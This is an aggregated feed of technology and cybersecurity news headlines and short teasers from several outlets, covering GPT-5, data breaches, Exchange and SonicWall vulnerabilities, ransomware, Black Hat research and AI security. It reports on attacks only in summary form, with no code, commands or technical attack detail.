A few taps and a swipe are all it takes to have your Android phone run in double time - sort of.

Read More
I used Perplexity to make a restaurant reservation - now I'm wondering if Google is holding us back
I used Perplexity to make a restaurant reservation - now I'm wondering if Google is holding us back

The newest AI tool connects directly to OpenTable, so you don't have to navigate between apps or tabs to book tables.

Read More
This free ChatGPT feature flew under the radar - but it's a game changer
This free ChatGPT feature flew under the radar - but it's a game changer

Everyone can use ChatGPT's Advanced Voice Mode now - yes, even free users.

Read More
Microsoft rolls out GPT-5 across its Copilot suite - here's what we know
Microsoft rolls out GPT-5 across its Copilot suite - here's what we know

GPT-5 is here, and Microsoft is integrating it into everything from chatbots to developer tools. Here's what's new, what works, and what to expect.

Read More
I replaced my Sonos soundbar for one with detachable rear speakers - and it's worth it
I replaced my Sonos soundbar for one with detachable rear speakers - and it's worth it

The JBL Bar 1000MK2 is a theater-in-a-box, and although its main selling point may sound counterintuitive, it works better than you'd think.

Read More
Five iOS 26 features I already can't live without - and how to access them
Five iOS 26 features I already can't live without - and how to access them

Available as both a developer beta and a public beta, iOS 26 offers a host of cool new features and enhancements. These are my favorites.

Read More
How AI-enabled autonomous business will change the way you work forever
How AI-enabled autonomous business will change the way you work forever

True autonomous business may be a long way off - here's why smart business leaders are preparing now.

Read More
A Linux terminal app for native Android development? Here's why I'm bullish
A Linux terminal app for native Android development? Here's why I'm bullish

Although Android already has a sandboxed Linux terminal available, this Google model will be geared toward developers.

Read More
17 iOS settings I changed to instantly improve my iPhone battery life
17 iOS settings I changed to instantly improve my iPhone battery life

Struggling to make your iPhone last all day? Don't rush to upgrade or replace the battery just yet. Try changing these iOS settings first to avoid that dreaded 1%.

Read More
Grab the 55-inch Samsung Odyssey Ark on sale and get a free smart monitor - here's how
Grab the 55-inch Samsung Odyssey Ark on sale and get a free smart monitor - here's how

Right now, you can save $1,200 on the Odyssey Ark monitor at Samsung, plus a free 32-inch M50D smart monitor and two years of Samsung Care+ for just $1.

Read More
Beware of promptware: How researchers broke into Google Home via Gemini
Beware of promptware: How researchers broke into Google Home via Gemini

This was just a demonstration, but you can take steps to protect yourself from similar promptware attacks.

Read More
Dashlane ends free subscriptions - you have one month to upgrade or switch
Dashlane ends free subscriptions - you have one month to upgrade or switch

If you store your passwords in a Dashlane Free account, you're about to lose that subscription. In a year, you lose all your data. Here are your options.

Read More
Finally, a Windows laptop that I wouldn't mind putting away my MacBook Pro for
Finally, a Windows laptop that I wouldn't mind putting away my MacBook Pro for

The newest Asus ProArt P16 is an impressive upgrade from its predecessor, making it one of the most powerful Windows laptops available for creative professionals.

Read More
These midrange Bose headphones are on sale for $130 off - act fast before the deal ends
These midrange Bose headphones are on sale for $130 off - act fast before the deal ends

Bose's QuietComfort Headphones provide powerful noise cancellation and a comfortable fit. Every color option has been discounted.

Read More
Just installed iOS 18.6 on your iPhone? I'd change these 11 settings ASAP
Just installed iOS 18.6 on your iPhone? I'd change these 11 settings ASAP

Tweak these settings to optimize your iPhone - and get better performance, battery life, and privacy.

Read More
I took over 500 photos with the Samsung S25 Ultra and Oppo Find X8 Ultra - the winner is very clear
I took over 500 photos with the Samsung S25 Ultra and Oppo Find X8 Ultra - the winner is very clear

I carried both the Samsung Galaxy S25 Ultra and the Oppo Find X8 Ultra on my trip to Sweden, but I'll pick only one of these phones for my next vacation.

Read More
ChatGPT can now talk nerdy to you - plus more personalities and other upgrades beyond GPT-5
ChatGPT can now talk nerdy to you - plus more personalities and other upgrades beyond GPT-5

GPT-5 is a big deal, but don't underestimate the power of these smaller feature upgrades - especially new access to Advance Voice Mode for free users.

Read More
Sign up for T-Mobile 5G home internet and get $300 back - here's how
Sign up for T-Mobile 5G home internet and get $300 back - here's how

Need an affordable home internet plan? Right now at T-Mobile, when you add or sign up for a new All-In 5G home internet plan, you'll get a $300 rebate.

Read More
TP-Link's new Wi-Fi 7 router is a travel-friendly option that won't break the bank
TP-Link's new Wi-Fi 7 router is a travel-friendly option that won't break the bank

The latest TP-Link BE3600 router is compact enough to fit in your pocket and connects all your devices to a single Wi-Fi network.

Read More
French Telecom Firm Bouygues Says Data Breach Affects 6.4M Customers
French Telecom Firm Bouygues Says Data Breach Affects 6.4M Customers

Bouygues has been targeted in a cyberattack that resulted in the personal information of millions of customers getting compromised.

The post French Telecom Firm Bouygues Says Data Breach Affects 6.4M Customers appeared first on SecurityWeek.

Read More
SonicWall Says Recent Attacks Don’t Involve Zero-Day Vulnerability
SonicWall Says Recent Attacks Don’t Involve Zero-Day Vulnerability

SonicWall has been investigating reports about a zero-day potentially being exploited in ransomware attacks, but found no evidence of a new vulnerability. 

The post SonicWall Says Recent Attacks Don’t Involve Zero-Day Vulnerability appeared first on SecurityWeek.

Read More
Black Hat USA 2025 – Summary of Vendor Announcements (Part 3)
Black Hat USA 2025 – Summary of Vendor Announcements (Part 3)

Many companies are showcasing their products and services this week at the 2025 edition of the Black Hat conference in Las Vegas.

The post Black Hat USA 2025 – Summary of Vendor Announcements (Part 3) appeared first on SecurityWeek.

Read More
Air France, KLM Say Hackers Accessed Customer Data
Air France, KLM Say Hackers Accessed Customer Data

Airlines Air France and KLM have disclosed a data breach stemming from unauthorized access to a third-party platform.

The post Air France, KLM Say Hackers Accessed Customer Data appeared first on SecurityWeek.

Read More
Organizations Warned of Vulnerability in Microsoft Exchange Hybrid Deployment
Organizations Warned of Vulnerability in Microsoft Exchange Hybrid Deployment

CISA and Microsoft have issued advisories for CVE-2025-53786, a high-severity flaw allowing privilege escalation in cloud environments. 

The post Organizations Warned of Vulnerability in Microsoft Exchange Hybrid Deployment appeared first on SecurityWeek.

Read More
New HTTP Request Smuggling Attacks Impacted CDNs, Major Orgs, Millions of Websites
New HTTP Request Smuggling Attacks Impacted CDNs, Major Orgs, Millions of Websites

A desync attack method leveraging HTTP/1.1 vulnerabilities impacted many websites and earned researchers more than $200,000 in bug bounties.

The post New HTTP Request Smuggling Attacks Impacted CDNs, Major Orgs, Millions of Websites appeared first on SecurityWeek.

Read More
Major Enterprise AI Assistants Can Be Abused for Data Theft, Manipulation
Major Enterprise AI Assistants Can Be Abused for Data Theft, Manipulation

Zenity has shown how AI assistants such as ChatGPT, Copilot, Cursor, Gemini, and Salesforce Einstein can be abused using specially crafted prompts.

The post Major Enterprise AI Assistants Can Be Abused for Data Theft, Manipulation appeared first on SecurityWeek.

Read More
Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities
Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities

CyberArk has patched several vulnerabilities that could be chained for unauthenticated remote code execution.

The post Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities appeared first on SecurityWeek.

Read More
Google Discloses Data Breach via Salesforce Hack
Google Discloses Data Breach via Salesforce Hack

A Google Salesforce instance may have been targeted as part of a ShinyHunters campaign that hit several major companies. 

The post Google Discloses Data Breach via Salesforce Hack  appeared first on SecurityWeek.

Read More
PLoB: A Behavioral Fingerprinting Framework to Hunt for Malicious Logins
PLoB: A Behavioral Fingerprinting Framework to Hunt for Malicious Logins

Splunk researchers developed a system to fingerprint post-logon behavior, using AI to find subtle signals of intrusion.

The post PLoB: A Behavioral Fingerprinting Framework to Hunt for Malicious Logins appeared first on SecurityWeek.

Read More
Prohibition never works, but that didn't stop the UK's Online Safety Act
Prohibition never works, but that didn't stop the UK's Online Safety Act

Will someone think of the deals politicians are making?

Opinion  You might think, since I write about tech all the time, my degrees are in computer science. Nope. I'm a bona fide, degreed historian, which is why I can say with confidence that the UK's recently passed Online Safety Act is doomed to fail.…

Read More
Why blow up satellites when you can just hack them?
Why blow up satellites when you can just hack them?

A pair of German researchers showed how easy it is

Black Hat  Four countries have now tested anti-satellite missiles (the US, China, Russia, and India), but it's much easier and cheaper just to hack them.…

Read More
German security researchers say 'Windows Hell No' to Microsoft biometrics for biz
German security researchers say 'Windows Hell No' to Microsoft biometrics for biz

Hello loophole could let a rogue admin, or a pwned one, inject new facial scans

Black Hat  Microsoft is pushing hard for Windows users to shift from using passwords to its Hello biometrics system, but researchers sponsored by the German government have found a critical flaw in its business implementation.…

Read More
Microsoft, CISA warn yet another Exchange server bug can lead to 'total domain compromise'
Microsoft, CISA warn yet another Exchange server bug can lead to 'total domain compromise'

No reported in-the-wild exploits…yet

Microsoft and the feds late Wednesday sounded the alarm on another high-severity bug in Exchange Server hybrid deployments that could allow attackers to escalate privileges from on-premises Exchange to the cloud.…

Read More
Black Hat's network ops center brings rivals together for a common cause
Black Hat's network ops center brings rivals together for a common cause

The Reg goes behind the scenes of the conference NOC, where volunteers 'look for a needle in a needle stack'

Black Hat  Neil "Grifter" Wyler is spending the week "looking for a needle in a needle stack," a task he'll perform from the network operations center (NOC) that powers the Black Hat security conference in Las Vegas.…

Read More
CISA releases malware analysis for Sharepoint Server attack
CISA releases malware analysis for Sharepoint Server attack

Indications of compromise and Sigma rules report for your security scanners amid ongoing 'ToolShell' blitz

CISA has published a malware analysis report with compromise indicators and Sigma rules for "ToolShell" attacks targeting specific Microsoft SharePoint Server versions.…

Read More
KLM, Air France latest major organizations looted for customer data
KLM, Air France latest major organizations looted for customer data

Watch out, the phishermen are about, customers told

European airline giants Air France and KLM say they are the latest in a string of major organizations to have their customers' data stolen by way of a break-in at a third party org.…

Read More
Meta training AI on social media posts? Only 7% in Europe think it's OK
Meta training AI on social media posts? Only 7% in Europe think it's OK

Privacy campaigner Max Schrem's NOYB is back on Zuck's back

Updated  Meta's enthusiasm for training its AI on user data is not shared by the users themselves – at least for some Europeans – according a study commissioned by Facebook legal nemesis Max Schrems and his privacy advocacy group Noyb.…

Read More
Amnesty slams Elon Musk's X for 'central role' in fueling 2024 UK riots
Amnesty slams Elon Musk's X for 'central role' in fueling 2024 UK riots

Human rights org calls for greater accountability and stronger enforcement of Online Safety Act

Amnesty International claims Elon Musk's X platform "played a central role" in pushing the misinformation that stoked racially charged violence following last year's Southport murders.…

Read More
Could agentic AI save us from the cybercrisis?
Could agentic AI save us from the cybercrisis?

Many hands make light work in the SOC

Sponsored feature  The cyberthreat landscape is evolving fast, with highly organized bad actors launching ever more devastating and sophisticated attacks against often ill-prepared targets.

Read More
Microsoft researchers bullish on AI security agent even though it let 74% of malware slip through
Microsoft researchers bullish on AI security agent even though it let 74% of malware slip through

Project Ire promises to use LLMs to detect whether code is malicious or benign

UPDATED  Microsoft has rolled out an autonomous AI agent that it claims can detect malware without human assistance.…

Read More
Google says the group behind last year's Snowflake attack slurped data from one of its Salesforce instances
Google says the group behind last year's Snowflake attack slurped data from one of its Salesforce instances

ShinyHunters suspected in rash of intrusions

Google confirmed that criminals breached one of its Salesforce databases and stole info belonging to some of its small-and-medium-business customers.…

Read More
Vibe coding tool Cursor's MCP implementation allows persistent code execution
Vibe coding tool Cursor's MCP implementation allows persistent code execution

More evidence that AI expands the attack surface

Check Point researchers uncovered a remote code execution bug in popular vibe-coding AI tool Cursor that could allow an attacker to poison developer environments by secretly modifying a previously approved Model Context Protocol (MCP) configuration, silently swapping it for a malicious command without any user prompt.…

Read More
Patch now: Millions of Dell PCs with Broadcom chips vulnerable to attack
Patch now: Millions of Dell PCs with Broadcom chips vulnerable to attack

Psst, wanna steal someone's biometrics?

black hat  Critical security flaws in Broadcom chips used in more than 100 models of Dell computers could allow attackers to take over tens of millions of users' devices, steal passwords, and access sensitive data, including fingerprint information, according to Cisco Talos.…

Read More
Study finds humans not completely useless at malware detection
Study finds humans not completely useless at malware detection

Some pinpointed software nasties but were suspicious of printer drivers too

Researchers from the Universities of Guelph and Waterloo have discovered exactly how users decide whether an application is legitimate or malware before installing it – and the good news is they're better than you might expect, at least when primed to expect malware.…

Read More
Chained bugs in Nvidia's Triton Inference Server lead to full system compromise
Chained bugs in Nvidia's Triton Inference Server lead to full system compromise

Wiz Research details flaws in Python backend that expose AI models and enable remote code execution

Security researchers have lifted the lid on a chain of high-severity vulnerabilities that could lead to remote code execution (RCE) on Nvidia's Triton Inference Server.…

Read More
Hacker summer camp: What to expect from BSides, Black Hat, and DEF CON
Hacker summer camp: What to expect from BSides, Black Hat, and DEF CON

These are the conference events to keep an eye on. You can even stream a few

The security industry is hitting Vegas hard this week with three conferences in Sin City that bring the world's largest collection of security pros together for the annual summer camp.…

Read More
Antivirus vendors fail to spot persistent, nasty, stealthy Linux backdoor
Antivirus vendors fail to spot persistent, nasty, stealthy Linux backdoor

'Plague' malware has been around for months without tripping alarms

Updated  Researchers at German infosec services company Nextron Threat have spotted malware that creates a highly-persistent Linux backdoor and said that antivirus engines did not initially flag the code as malicious.…

Read More
SonicWall investigates 'cyber incidents,' including ransomware targeting suspected 0-day
SonicWall investigates 'cyber incidents,' including ransomware targeting suspected 0-day

Bypassing MFA and deploying ransomware…sounds like something that rhymes with 'schmero-day'

SonicWall on Monday confirmed that it's investigating a rash of ransomware activity targeting its firewall devices, following multiple reports of a zero-day bug under active exploit in its VPNs.…

Read More
Python-powered malware snags hundreds of credit cards, 200K passwords, and 4M cookies
Python-powered malware snags hundreds of credit cards, 200K passwords, and 4M cookies

PXA Stealer pilfers data from nearly 40 browsers, including Chrome

More than 4,000 victims across 62 countries have been infected by stealthy infostealers pilfering people's passwords, credit card numbers, and browser cookies, which are then sold to other criminals on Telegram-based marketplaces.…

Read More
Mozilla flags phishing wave aimed at hijacking trusted Firefox add-ons
Mozilla flags phishing wave aimed at hijacking trusted Firefox add-ons

Devs told to exercise 'extreme caution' with emails disguised as account update prompts

Mozilla is warning of an ongoing phishing campaign targeting developers of Firefox add-ons.…

Read More
German phone repair biz collapses following 2023 ransomware attack
German phone repair biz collapses following 2023 ransomware attack

Founder miffed over prosecutors holding onto its Bitcoin

The founder of a German mobile phone repair and insurance biz has begun insolvency proceedings for some operations in his company after struggling financially following a costly ransomware attack in 2023.…

Read More
When hyperscalers can’t safeguard one nation’s data from another, dark clouds are ahead
When hyperscalers can’t safeguard one nation’s data from another, dark clouds are ahead

If it’s not on-prem, it’s on the menu

Opinion  The details of cloud data regionalization are rarely the stuff of great drama. When they’ve reached the level of an exec admitting to the Senate that a foreign power can help itself to that nation's data, no matter where it lives, things get interesting.…

Read More
Millions of age checks performed as UK Online Safey Act gets rolling
Millions of age checks performed as UK Online Safey Act gets rolling

But it's OK, claims Brit government, no personal data stored 'unless absolutely necessary'

The UK government has reported that an additional five million age checks are being made daily as UK-based internet users seek to access age-restricted sites following the implementation of the Online Safety Act."…

Read More
China’s botched Great Firewall upgrade invites attacks on its censorship infrastructure
China’s botched Great Firewall upgrade invites attacks on its censorship infrastructure

Attempts to censor QUIC traffic create chance to block access to offshore DNS resolvers

China’s attempts to censor traffic carried using Quick UDP Internet Connections (QUIC) are imperfect and have left the country at risk of attacks that degrade its censorship apparatus, or even cut access to offshore DNS resolvers.…

Read More
Lazarus Group rises again, this time with malware-laden fake FOSS
Lazarus Group rises again, this time with malware-laden fake FOSS

PLUS: Slow MFA rollout costs Canucks $5m; Lawmakers ponder Stingray ban; MSFT tightens Teams; And more!

Infosec In Brief  North Korea’s Lazarus Group has changed tactics and is now creating malware-laden open source software.…

Read More
Silent Push CEO on cybercrime takedowns: 'It's an ongoing cat-and-mouse game'
Silent Push CEO on cybercrime takedowns: 'It's an ongoing cat-and-mouse game'

Plus: why takedowns aren't in threat-intel analysts' best interest

interview  It started out small: One US financial services company wanted to stop unknown crooks from spoofing their trading app, tricking customers into giving the digital thieves their login credentials and account information, thus allowing them to drain their accounts.…

Read More
CISA roasts unnamed critical national infrastructure body for shoddy security hygiene
CISA roasts unnamed critical national infrastructure body for shoddy security hygiene

Plaintext passwords, shared admin accounts, and insufficient logging rampant at mystery org

CISA is using the findings from a recent probe of an unidentified critical infrastructure organization to warn about the dangers of getting cybersecurity seriously wrong.…

Read More
OpenAI removes ChatGPT self-doxing option
OpenAI removes ChatGPT self-doxing option

Checkbox to make chatbot conversations appear in search engines deemed a footgun

OpenAI has removed the option to make ChatGPT interactions indexable by search engines to prevent users from unwittingly exposing sensitive information.…

Read More
Tested: Microsoft Recall can still capture credit cards and passwords, a treasure trove for crooks
Tested: Microsoft Recall can still capture credit cards and passwords, a treasure trove for crooks

Our tests have shown there are ways to get around the promised security improvements

exclusive  Microsoft Recall, the AI app that takes screenshots of what you do on your PC so you can search for it later, has a filter that's supposed to prevent it from screenshotting sensitive info like credit card numbers. But a The Register test shows that it still fails in many cases, creating a potential treasure trove for thieves.…

Read More
China says US spies exploited Microsoft Exchange zero-day to steal military info
China says US spies exploited Microsoft Exchange zero-day to steal military info

Spy vs. spy

China has accused US intelligence agencies of exploiting a Microsoft Exchange zero-day exploit to steal defense-related data and take over more than 50 devices belonging to a "major Chinese military enterprise" for nearly a year.…

Read More
Florida prison email blunder exposes visitor contact info to inmates
Florida prison email blunder exposes visitor contact info to inmates

Victims fear leak at Everglades Correctional Institution could lead to violent extortion

A data breach at a Florida prison has inmates' families concerned for their welfare after their contact details were allegedly leaked to convicted criminals.…

Read More
Cybercrooks attached Raspberry Pi to bank network and drained ATM cash
Cybercrooks attached Raspberry Pi to bank network and drained ATM cash

Criminals used undocumented techniques and well-placed insiders to remotely withdraw money

A ring of cybercriminals managed to physically implant a Raspberry Pi on a bank's network to steal cash from an Indonesian ATM.…

Read More
Top spy says LinkedIn profiles that list defense work 'recklessly invite attention of foreign intelligence services'
Top spy says LinkedIn profiles that list defense work 'recklessly invite attention of foreign intelligence services'

Workers on joint US/UK/Australia nuclear submarine program are painting a target on themselves

The Director-General of Security at the Australian Security Intelligence Organization (ASIO) has lamented the fact that many people list their work in the intelligence community or on sensitive military projects in their LinkedIn profiles.…

Read More
As ransomware gangs threaten physical harm, 'I am afraid of what's next,' ex-negotiator says
As ransomware gangs threaten physical harm, 'I am afraid of what's next,' ex-negotiator says

Crims warned 40% of respondents that they and their families would suffer

Ransomware gangs now frequently threaten physical violence against employees and their families as a way to force victim organizations into paying their demands.…

Read More
Gene scanner pays $9.8 million to get feds off its back in security flap
Gene scanner pays $9.8 million to get feds off its back in security flap

Illumina allegedly lied about its testing devices meeting government standards

Biotech firm Illumina has agreed to cut the US government a check for the eminently affordable amount of $9.8 million to resolve allegations that it has been selling the feds genetic testing systems riddled with security vulnerabilities the company knew about but never bothered to fix.…

Read More
Microsoft's Azure AI Speech needs just seconds of audio to spit out a convincing deepfake
Microsoft's Azure AI Speech needs just seconds of audio to spit out a convincing deepfake

No way this will be abused

Microsoft has upgraded Azure AI Speech so that users can rapidly generate a voice replica with just a few seconds of sampled speech.…

Read More
Beijing summons Nvidia over alleged backdoors in China-bound AI chips
Beijing summons Nvidia over alleged backdoors in China-bound AI chips

H20 silicon under the microscope after slipping through US export bans

China's internet watchdog has hauled Nvidia in for a grilling over alleged backdoors in its H20 chips, the latest twist in the increasingly paranoid semiconductor spat between Washington and Beijing.…

Read More
Kremlin goons caught abusing ISPs to spy on Moscow-based diplomats, Microsoft says
Kremlin goons caught abusing ISPs to spy on Moscow-based diplomats, Microsoft says

Russia spying on foreign embassies? Say it ain't so

Russian cyberspies are abusing local internet service providers' networks to target foreign embassies in Moscow and collect intel from diplomats' devices, according to a Microsoft Threat Intelligence warning.…

Read More
Silk Typhoon spun a web of patents for offensive cyber tools, report says
Silk Typhoon spun a web of patents for offensive cyber tools, report says

US court docs reveal that infamous Chinese snoops filed IP papers like tax returns

Security researchers have uncovered more than a dozen patents for offensive cybersecurity tools filed by Chinese companies allegedly tied to Beijing's Silk Typhoon espionage crew.…

Read More
Brit watchdog pushes to rein in Microsoft and AWS with 'strategic market status'
Brit watchdog pushes to rein in Microsoft and AWS with 'strategic market status'

Regulators around the globe pay attention as results of 21-month cloud probe published

Britain's competition regulator says Microsoft and AWS are using their dominance to harm UK cloud customers and proposes to designate both with strategic market status (SMS) to take action against them.…

Read More
NHS disability equipment provider on brink of collapse a year after cyberattack
NHS disability equipment provider on brink of collapse a year after cyberattack

Government officials say they are monitoring the situation

A major supplier of healthcare equipment to the UK's National Health Service and local councils is on the verge of collapse 16 months after falling victim to cyber criminals.…

Read More
Banning VPNs to protect kids? Good luck with that
Banning VPNs to protect kids? Good luck with that

UK's Online Safety Act kicks off about as well as everyone expected

Analysis  With the UK's Online Safety Act (OSA) now in effect, it was only a matter of time before tech-savvy under-18s figured out how to bypass the rules and regain access to adult content.…

Read More
Internet exchange points are ignored, vulnerable, and absent from infrastructure protection plans
Internet exchange points are ignored, vulnerable, and absent from infrastructure protection plans

Italian operator calls for lawmakers to wake up to the critical role played by peering

Internet Exchange Points are an underappreciated resource that all internet users rely on, but governments have unfortunately ignored them, despite their status as critical infrastructure.…

Read More
Lethal Cambodia-Thailand border clash linked to cyber-scam slave camps
Lethal Cambodia-Thailand border clash linked to cyber-scam slave camps

Infosec issues spill into the real world and regional politics

Analysis  Thai and Cambodian tensions relating to issues including cybersecurity concerns boiled over into a kinetic skirmish at the border last week.…

Read More
The TSA likes facial recognition at airports. Passengers and politicians, not so much
The TSA likes facial recognition at airports. Passengers and politicians, not so much

Few passengers are told they can opt out, and when they do, airport staff may push back

US lawmakers are trying to extend the use of facial recognition at airports, despite many airline passengers objecting to the practice.…

Read More
Enterprises neglect AI security – and attackers have noticed
Enterprises neglect AI security – and attackers have noticed

IBM report shows a rush to embrace technology without safeguarding it, and as for governance...

Organizations rushing to implement AI are neglecting security and governance, IBM claims, with attackers already taking advantage of lax protocols to target models and applications.…

Read More
Users left scrambling for a plan B as Dropbox drops Dropbox Passwords
Users left scrambling for a plan B as Dropbox drops Dropbox Passwords

Read-only in weeks, deleted forever in months

Dropbox has given users of its password manager until the end of October to extract their data before pulling the plug on the service.…

Read More
Minnesota governor calls in the troops after St Paul cyberattack
Minnesota governor calls in the troops after St Paul cyberattack

'This was a deliberate, coordinated, digital attack'

Minnesota Governor Tim Walz has activated the state's National Guard and declared a state of emergency in response to a cyberattack on the city of Saint Paul.…

Read More
Palo Alto Networks inks $25b deal to buy identity-security shop CyberArk
Palo Alto Networks inks $25b deal to buy identity-security shop CyberArk

The lure? Identity security and privileged access management tools to verify humans and... machines

Palo Alto Networks will buy Israeli security biz CyberArk in a $25 billion cash-and-stock deal confirmed today.…

Read More
Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records
Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records

Bouygues Telecom revealed the attackers stole personal data of 6.4 million customers, including contact details, contractual data and international bank account numbers

Read More
#BHUSA: 1000 DoD Contractors Now Covered by NSA’s Free Cyber Services Program
#BHUSA: 1000 DoD Contractors Now Covered by NSA’s Free Cyber Services Program

The NSA’s CAPT program, launched in 2024 with Horizon3.ai, now benefits 1000 of the 300,000 US Defense Industrial Base companies

Read More
#BHUSA: Microsoft Debuts AI Agent Able to Reverse Engineer Malware
#BHUSA: Microsoft Debuts AI Agent Able to Reverse Engineer Malware

A new Microsoft AI agent, named Project Ire, is able to autonomously classify malware at a global scale with a high level of precision

Read More
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk

Microsoft Exchange customers have been urged to apply fixes set out in a hybrid deployment security update published in April

Read More
Google Among Victims in Ongoing Salesforce Data Theft Campaign
Google Among Victims in Ongoing Salesforce Data Theft Campaign

Google confirms it was among the victims of an ongoing data theft campaign targeting Salesforce instances, where publicly available business names and contact details were retrieved by the threat actor

Read More
Experts Alarmed by UK Government’s Companies House ID Checks
Experts Alarmed by UK Government’s Companies House ID Checks

A UK government initiative to tackle Companies House fraud has raised security concerns

Read More
SonicWall: Attacks Linked to Legacy Bug and Password Use
SonicWall: Attacks Linked to Legacy Bug and Password Use

SonicWall has claimed an uptick in Akira ransomware intrusions is due to legacy password use

Read More
#BHUSA: Security Researchers Uncover Critical Flaws in Axis CCTV Software
#BHUSA: Security Researchers Uncover Critical Flaws in Axis CCTV Software

Claroty researchers have uncovered four vulnerabilities in a proprietary protocol used by surveillance equipment manufacturer Axis Communications

Read More
#BHUSA: Researchers Expose Infrastructure Behind Cybercrime Network VexTrio
#BHUSA: Researchers Expose Infrastructure Behind Cybercrime Network VexTrio

According to Infoblox’s new report, the VexTrio cybercrime-enabling network originates from Italy and Eastern Europe

Read More
Clinical Data Stolen in Cyber-Attack on Kidney Dialysis Provider DaVita
Clinical Data Stolen in Cyber-Attack on Kidney Dialysis Provider DaVita

The incident, reported to be ransomware-related, has resulted in attackers stealing sensitive personal and clinical data, including lab test results

Read More
#BHUSA: OpenAI Launches Red Teaming Challenge for New Open-Weight LLMs
#BHUSA: OpenAI Launches Red Teaming Challenge for New Open-Weight LLMs

GenAI company OpenAI has launched its first-ever open-weight models alongside a red teaming challenge

Read More
US Authorities Extradite Nigerian Man Accused of Hacking and Fraud
US Authorities Extradite Nigerian Man Accused of Hacking and Fraud

A Nigerian man accused of hacking, fraud and identity theft has been extradited from France to the US to face charges

Read More
August 2025 Patch Tuesday forecast: Try, try again
August 2025 Patch Tuesday forecast: Try, try again

July turned into a surprisingly busy month. It started slowly with a fairly ‘calm’ Patch Tuesday as I forecasted in my last blog. Although there were 130 new CVEs addressed across all the Microsoft releases, there was only one publicly disclosed CVE, so the risk was low. But a short time later, two CVEs in SharePoint were reported exploited, and the month started to heat up with hotfixes near the end of the month. Mix … More

The post August 2025 Patch Tuesday forecast: Try, try again appeared first on Help Net Security.

Read More
Third-party partners or ticking time bombs?
Third-party partners or ticking time bombs?

In this Help Net Security video, Ngaire Elizabeth Guzzetti, Technical Director Supply Chain at CyXcel, discusses why a third of U.S. organizations don’t trust third-party vendors to manage critical risks and what that means for supply chain security. She breaks down the root causes of this trust gap, including poor visibility, inadequate governance, and the growing complexity introduced by AI. Guzzetti also shares practical guidance for building more resilient vendor relationships through tiered oversight, continuous … More

The post Third-party partners or ticking time bombs? appeared first on Help Net Security.

Read More
From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends
From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends

Cybercriminals are getting better at lying. That’s the takeaway from a new LevelBlue report, which outlines how attackers are using social engineering and legitimate tools to quietly move through environments before they’re caught. Data showing at what stage an incident was detected (Source: LevelBlue) In that short window, the number of customers affected by security incidents nearly tripled. The rate jumped from 6 percent in late 2024 to 17 percent in early 2025. More than … More

The post From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends appeared first on Help Net Security.

Read More
Fraud controls don’t guarantee consumer trust
Fraud controls don’t guarantee consumer trust

Over a third of companies say they are using AI, including generative AI, to fight fraud, according to Experian. As fraud threats become more complex, companies are accelerating their investments with over half adopting new analytics and building AI models to enhance customer decision-making. The AI paradox AI is playing a double role in the fight against fraud. It’s helping businesses detect threats faster, but it’s also fueling new scams like deepfakes and impersonation. Agentic … More

The post Fraud controls don’t guarantee consumer trust appeared first on Help Net Security.

Read More
New infosec products of the week: August 8, 2025
New infosec products of the week: August 8, 2025

Here’s a look at the most interesting products from the past week, featuring releases from Black Kite, Descope, Elastic, ExtraHop, LastPass, and Riverbed. Elastic AI SOC Engine helps SOC teams expose hidden threats Elastic AI SOC Engine (EASE) is a new serverless, easy-to-deploy security package that brings AI-driven context-aware detection and triage into existing SIEM and EDR tools, without the need for an immediate migration or replacement. New Black Kite tool identifies which vendors are … More

The post New infosec products of the week: August 8, 2025 appeared first on Help Net Security.

Read More
What GPT‑5 means for IT teams, devs, and the future of AI at work
What GPT‑5 means for IT teams, devs, and the future of AI at work

OpenAI has released GPT‑5, the newest version of its large language model. It’s now available to developers and ChatGPT users, and it brings some real changes to how AI can be used in business and IT environments. GPT‑5 (with thinking) performs better than OpenAI o3 with 50-80% less output tokens across capabilities, including visual reasoning, agentic coding, and graduate-level scientific problem solving (Source: Open AI) Unlike previous versions, GPT‑5 uses a new approach behind the … More

The post What GPT‑5 means for IT teams, devs, and the future of AI at work appeared first on Help Net Security.

Read More
Microsoft urges admins to plug severe Exchange security hole (CVE-2025-53786)
Microsoft urges admins to plug severe Exchange security hole (CVE-2025-53786)

“In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization’s connected cloud environment without leaving easily detectable and auditable trace,” Microsoft has announced on Wednesday. The privilege escalation can be performed by exploiting CVE-2025-53786, a newly disclosed vulnerability that stems from Exchange Server and Exchange Online sharing the same service principal – i.e., the Office 365 Exchange Online application – in … More

The post Microsoft urges admins to plug severe Exchange security hole (CVE-2025-53786) appeared first on Help Net Security.

Read More
SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls
SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls

Akira ransomware affiliates are not leveraging an unknown, zero-day vulnerability in SonicWall Gen 7 firewalls to breach corporate networks, the security vendor shared today. “Instead, there is a significant correlation with threat activity related to CVE-2024-40766, which was previously disclosed and documented in our public advisory.” What happened? Since July 15, 2025, researchers have observed a notable surge in ransomware activity targeting SonicWall firewalls, specifically via their SSL VPN functionality, and posited that the attackers … More

The post SonicWall: Attackers did not exploit zero-day vulnerability to compromise Gen 7 firewalls appeared first on Help Net Security.

Read More
Top solutions to watch after Black Hat USA 2025
Top solutions to watch after Black Hat USA 2025

Black Hat USA 2025 was packed with innovation, with companies showing off tools built to get ahead of what’s coming next. From smarter offensive security to new ways of spotting attacks faster, the conference had no shortage of exciting developments. Here are some of the products that stood out and could play a big role in where cybersecurity goes from here. Darwinium launches AI tools to detect and disrupt adversarial threats Darwinium launched Beagle and … More

The post Top solutions to watch after Black Hat USA 2025 appeared first on Help Net Security.

Read More
Photos: Black Hat USA 2025
Photos: Black Hat USA 2025

Here’s a look inside Black Hat USA 2025. The featured vendors are: Stellar Cyber, Vonahi Security, Gurucul, Check Point, HackerOne, EasyDMARC, Elastic, Google, Tines, Veracode, VioletX, Pentera, Keep Aware, Oleria, SpyCloud, Trend Micro and Picus Security.

